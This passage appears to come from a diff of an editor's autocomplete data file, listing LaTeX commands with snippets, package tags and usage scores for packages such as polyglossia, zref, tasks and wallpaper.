caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'vwcol-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'vwcol-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'vwcol-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'vwcol-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'vwcol-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'vwcol-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'vwcol-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'vwcol-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'vwcol-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'vwcol-cmd', + score: 0.021170869458413965, + }, + ], + multimedia: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'multimedia-cmd', + score: 0.00037306820619479756, + }, + ], + sgame: [ + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'sgame-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'sgame-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'sgame-cmd', + score: 
0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'sgame-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'sgame-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'sgame-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'sgame-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'sgame-cmd', + score: 0.2864294797053033, + }, + ], + bussproofs: [ + { + caption: '\\makeatletter', + snippet: '\\makeatletter', + meta: 'bussproofs-cmd', + score: 0.041979363643201636, + }, + { + caption: '\\makeatother', + snippet: '\\makeatother', + meta: 'bussproofs-cmd', + score: 0.03923442255397878, + }, + ], + titlepic: [ + { + caption: '\\titlepic{}', + snippet: '\\titlepic{$1}', + meta: 'titlepic-cmd', + score: 0.00020896323441399082, + }, + { + caption: '\\maketitle', + snippet: '\\maketitle', + meta: 'titlepic-cmd', + score: 0.7504160124360846, + }, + ], + paracol: [ + { + caption: '\\switchcolumn', + snippet: '\\switchcolumn', + meta: 'paracol-cmd', + score: 0.0008273060639466222, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'paracol-cmd', + score: 0.008565354665444157, + }, + ], + polyglossia: [ + { + caption: '\\markboth{}{}', + snippet: '\\markboth{$1}{$2}', + meta: 'polyglossia-cmd', + score: 0.038323601301945065, + }, + { + caption: '\\markboth{}', + snippet: '\\markboth{$1}', + meta: 'polyglossia-cmd', + score: 0.038323601301945065, + }, + { + caption: '\\normalfont', + snippet: '\\normalfont', + meta: 'polyglossia-cmd', + score: 0.06871177093091137, + }, + { + caption: '\\normalfont{}', + snippet: '\\normalfont{$1}', + meta: 'polyglossia-cmd', + score: 0.06871177093091137, + }, + { + caption: '\\setdefaultlanguage{}', + snippet: '\\setdefaultlanguage{$1}', + meta: 'polyglossia-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'polyglossia-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'polyglossia-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'polyglossia-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'polyglossia-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'polyglossia-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'polyglossia-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'polyglossia-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'polyglossia-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'polyglossia-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'polyglossia-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'polyglossia-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + 
snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'polyglossia-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'polyglossia-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'polyglossia-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'polyglossia-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'polyglossia-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'polyglossia-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'polyglossia-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'polyglossia-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'polyglossia-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'polyglossia-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'polyglossia-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'polyglossia-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'polyglossia-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'polyglossia-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'polyglossia-cmd', + score: 0.2864294797053033, + }, + ], + 'zref-user': [ + { + caption: '\\zlabel{}', + snippet: '\\zlabel{$1}', + meta: 'zref-user-cmd', + score: 0.0005277905480209891, + }, + { + caption: '\\zref', + snippet: '\\zref', + meta: 'zref-user-cmd', + score: 0.002193637536912482, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-user-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'zref-user-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'zref-user-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\check{}', + snippet: '\\check{$1}', + meta: 'zref-user-cmd', + score: 0.0058342578961340175, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'zref-user-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-user-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-user-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'zref-user-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-user-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'zref-user-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'zref-user-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'zref-user-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: 
'\\csname', + meta: 'zref-user-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'zref-user-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'zref-user-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'zref-user-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-user-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-user-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'zref-user-cmd', + score: 0.002958865219480927, + }, + ], + 'zref-abspage': [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'zref-abspage-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'zref-abspage-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'zref-abspage-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\AtBeginShipout{}', + snippet: '\\AtBeginShipout{$1}', + meta: 'zref-abspage-cmd', + score: 0.00047530324346933345, + }, + { + caption: '\\AtBeginShipoutNext{}', + snippet: '\\AtBeginShipoutNext{$1}', + meta: 'zref-abspage-cmd', + score: 0.0005277905480209891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-abspage-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-abspage-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'zref-abspage-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'zref-abspage-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\check{}', + snippet: '\\check{$1}', + meta: 'zref-abspage-cmd', + score: 0.0058342578961340175, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'zref-abspage-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-abspage-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-abspage-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'zref-abspage-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-abspage-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'zref-abspage-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'zref-abspage-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'zref-abspage-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-abspage-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'zref-abspage-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'zref-abspage-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'zref-abspage-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-abspage-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 
'zref-abspage-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'zref-abspage-cmd', + score: 0.002958865219480927, + }, + ], + quotchap: [ + { + caption: '\\chapter{}', + snippet: '\\chapter{$1}', + meta: 'quotchap-cmd', + score: 0.422097569591803, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'quotchap-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'quotchap-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\qauthor{}', + snippet: '\\qauthor{$1}', + meta: 'quotchap-cmd', + score: 0.002335082759143631, + }, + ], + misccorr: [ + { + caption: '\\subsection{}', + snippet: '\\subsection{$1}', + meta: 'misccorr-cmd', + score: 1.3890912739512353, + }, + { + caption: '\\section{}', + snippet: '\\section{$1}', + meta: 'misccorr-cmd', + score: 3.0952612541683835, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'misccorr-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\makelabel', + snippet: '\\makelabel', + meta: 'misccorr-cmd', + score: 5.739925426740175e-5, + }, + { + caption: '\\makelabel{}', + snippet: '\\makelabel{$1}', + meta: 'misccorr-cmd', + score: 5.739925426740175e-5, + }, + { + caption: '\\makelabel[]{}', + snippet: '\\makelabel[$1]{$2}', + meta: 'misccorr-cmd', + score: 5.739925426740175e-5, + }, + { + caption: '\\frak{}', + snippet: '\\frak{$1}', + meta: 'misccorr-cmd', + score: 0.0017966000518546787, + }, + { + caption: '\\checkmark', + snippet: '\\checkmark', + meta: 'misccorr-cmd', + score: 0.025060530944368123, + }, + { + caption: '\\bold', + snippet: '\\bold', + meta: 'misccorr-cmd', + score: 0.0014358547624941567, + }, + { + caption: '\\bold{}', + snippet: '\\bold{$1}', + meta: 'misccorr-cmd', + score: 0.0014358547624941567, + }, + { + caption: '\\Bbb{}', + snippet: '\\Bbb{$1}', + meta: 'misccorr-cmd', + score: 0.0006671850995492977, + }, + { + caption: '\\Bbb', + snippet: '\\Bbb', + meta: 'misccorr-cmd', + score: 0.0006671850995492977, + }, + ], + academicons: [ + { + caption: '\\aiResearchGateSquare', + snippet: '\\aiResearchGateSquare', + meta: 'academicons-cmd', + score: 0.0005747853176838451, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'academicons-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'academicons-cmd', + score: 0.2864294797053033, + }, + ], + tasks: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tasks-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tasks-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tasks-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tasks-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'tasks-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'tasks-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tasks-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tasks-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tasks-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 
'tasks-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tasks-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tasks-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tasks-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'tasks-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'tasks-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'tasks-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'tasks-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'tasks-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'tasks-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'tasks-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'tasks-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'tasks-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'tasks-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'tasks-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'tasks-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'tasks-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'tasks-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'tasks-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'tasks-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tasks-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'tasks-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'tasks-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'tasks-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'tasks-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tasks-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'tasks-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tasks-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tasks-cmd', + score: 0.021170869458413965, + }, + { + caption: 
'\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'tasks-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'tasks-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'tasks-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'tasks-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'tasks-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tasks-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'tasks-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'tasks-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tasks-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'tasks-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'tasks-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'tasks-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'tasks-cmd', + score: 0.2864294797053033, + }, + ], + 'pstricks-add': [ + { + caption: '\\green', + snippet: '\\green', + meta: 'pstricks-add-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\green{}', + snippet: '\\green{$1}', + meta: 'pstricks-add-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\documentclass[]{}', + snippet: '\\documentclass[$1]{$2}', + meta: 'pstricks-add-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\documentclass{}', + snippet: '\\documentclass{$1}', + meta: 'pstricks-add-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\gray', + snippet: '\\gray', + meta: 'pstricks-add-cmd', + score: 0.0005786730478266738, + }, + { + caption: '\\red{}', + snippet: '\\red{$1}', + meta: 'pstricks-add-cmd', + score: 0.006520475264573554, + }, + { + caption: '\\red', + snippet: '\\red', + meta: 'pstricks-add-cmd', + score: 0.006520475264573554, + }, + ], + extramarks: [ + { + caption: '\\leftmark', + snippet: '\\leftmark', + meta: 'extramarks-cmd', + score: 0.01094124445235767, + }, + { + caption: '\\extramarks{}{}', + snippet: '\\extramarks{$1}{$2}', + meta: 'extramarks-cmd', + score: 0.0003269562507660904, + }, + { + caption: '\\markboth{}{}', + snippet: '\\markboth{$1}{$2}', + meta: 'extramarks-cmd', + score: 0.038323601301945065, + }, + { + caption: '\\markboth{}', + snippet: '\\markboth{$1}', + meta: 'extramarks-cmd', + score: 0.038323601301945065, + }, + { + caption: '\\markright{}', + snippet: '\\markright{$1}', + meta: 'extramarks-cmd', + score: 0.007138622674767024, + }, + { + caption: '\\markright{}{}', + snippet: '\\markright{$1}{$2}', + meta: 'extramarks-cmd', + score: 0.007138622674767024, + }, + { + caption: '\\rightmark', + snippet: '\\rightmark', + meta: 'extramarks-cmd', + score: 0.008472328846194114, + }, + ], + calrsfs: [ + { + caption: '\\mathcal{}', + snippet: '\\mathcal{$1}', + meta: 'calrsfs-cmd', + score: 0.35084018920966636, + }, + ], + newlfont: [ + { + caption: '\\em', + snippet: '\\em', + meta: 'newlfont-cmd', + score: 
0.10357353994640862, + }, + ], + mdwtab: [ + { + caption: '\\cline{}', + snippet: '\\cline{$1}', + meta: 'mdwtab-cmd', + score: 0.07276573550543858, + }, + { + caption: '\\hline', + snippet: '\\hline', + meta: 'mdwtab-cmd', + score: 1.3209538327406387, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'mdwtab-cmd', + score: 0.5473606021405326, + }, + ], + mdwmath: [ + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'mdwmath-cmd', + score: 0.04318078602869565, + }, + ], + wallpaper: [ + { + caption: '\\CenterWallPaper{}{}', + snippet: '\\CenterWallPaper{$1}{$2}', + meta: 'wallpaper-cmd', + score: 0.00042983945496357105, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'wallpaper-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'wallpaper-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'wallpaper-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'wallpaper-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'wallpaper-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'wallpaper-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'wallpaper-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'wallpaper-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'wallpaper-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'wallpaper-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'wallpaper-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'wallpaper-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'wallpaper-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\AtBeginShipout{}', + snippet: '\\AtBeginShipout{$1}', + meta: 'wallpaper-cmd', + score: 0.00047530324346933345, + }, + { + caption: '\\AtBeginShipoutNext{}', + snippet: '\\AtBeginShipoutNext{$1}', + meta: 'wallpaper-cmd', + score: 0.0005277905480209891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'wallpaper-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\AddToShipoutPictureFG{}', + snippet: '\\AddToShipoutPictureFG{$1}', + meta: 'wallpaper-cmd', + score: 0.000325977535138643, + }, + { + caption: '\\AddToShipoutPictureBG{}', + snippet: '\\AddToShipoutPictureBG{$1}', + meta: 'wallpaper-cmd', + score: 0.0008957666085644653, + }, + { + caption: '\\AtPageUpperLeft{}', + snippet: '\\AtPageUpperLeft{$1}', + meta: 'wallpaper-cmd', + score: 0.0003608141410278152, + }, + { + caption: '\\LenToUnit{}', + snippet: '\\LenToUnit{$1}', + meta: 'wallpaper-cmd', + score: 0.0007216282820556304, + }, + { + caption: '\\AddToShipoutPicture{}', + snippet: '\\AddToShipoutPicture{$1}', + meta: 'wallpaper-cmd', + score: 0.0017658629469099734, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'wallpaper-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: 
'\\expandafter{$1}', + meta: 'wallpaper-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'wallpaper-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'wallpaper-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'wallpaper-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'wallpaper-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'wallpaper-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'wallpaper-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'wallpaper-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'wallpaper-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'wallpaper-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'wallpaper-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'wallpaper-cmd', + score: 0.004719094298848707, + }, + { + caption: 